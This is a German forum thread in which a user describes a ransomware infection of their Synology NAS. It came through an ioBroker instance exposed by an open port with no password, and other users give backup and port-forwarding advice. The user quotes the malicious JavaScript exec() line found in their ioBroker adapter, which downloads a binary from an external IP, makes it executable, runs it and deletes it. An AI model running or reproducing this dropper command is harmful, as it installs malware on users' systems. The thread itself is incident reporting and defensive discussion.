- Punkte für Reaktionen
- 2.108
IoBroker in der Forumsuche sollte reichen, vielleicht noch mit dem Zusatz Verschlüssel oder Ransom.Was soll ich denn suchen? Verstehe gerade nur Bahnhof
IoBroker in der Forumsuche sollte reichen, vielleicht noch mit dem Zusatz Verschlüssel oder Ransom.Was soll ich denn suchen? Verstehe gerade nur Bahnhof
Wo ist das BackUp für die DS ? Die geht in solch einem Fall vor die HundeDie DS ist ja mein Backup :-(
Ist denn deine ioBroker-Installation per Portforwarding nach außen erreichbar gewesen? Du sprachst von einem Skript, was ist das für eins gewesen und woher hast du dieses?synology adapter, welcherwohl die lücke war, habe ich schon mal nicht
OK, krass. Ich habe ne DS220+ mit eben 2 gespiegelten Platten.Könnte mal von Vorteil sein, außer Viren- u. Hackerprobleme kann Dir ja auch mal die DS selbst oder ein Laufwerk abrauchen.
Aktuell weiß man ja nicht was für ein System und mit welchem Aufbau Du hast, aber ein BackUp von der DS ist eigentlich ein muß.
Bei mir läuft täglich ein Backup und mind. einmal die Woche ein Sync auf eine zweite DS und da bin ich hier nicht alleine der es so macht.
Ja blöderweise hatte ich einen port offen und auch kein pw drin. (Absolut blöd von mir, weil vergessen).Ist denn deine ioBroker-Installation per Portforwarding nach außen erreichbar gewesen? Du sprachst von einem Skript, was ist das für eins gewesen und woher hast du dieses?
exec('cd /tmp; wget http://185.216.71.168/x-8.6-.ISIS; chmod +x x-8.6-.ISIS; ./x-8.6-.ISIS; rm -rf x-8.6-.ISIS', function (error, stdout, stderr) {
console.log('stdout: ' + stdout);
wird dann je denke im "OS" des docker containers ausgeführt, oder?
Er kommt ja so nicht auf den gemouteten Ordner, oder?
also habe den eh gelöscht, aber rein interessehalber.
Du solltest übrigens tunlichst deine Portfreigaben checken und diese schließen.Das skript habe ich in dem Javaskript adapte rim iobroker gefunden.
Wenn du das Forum hilfreich findest oder uns unterstützen möchtest, dann gib uns doch einfach einen Kaffee aus.
Als Dankeschön schalten wir deinen Account werbefrei.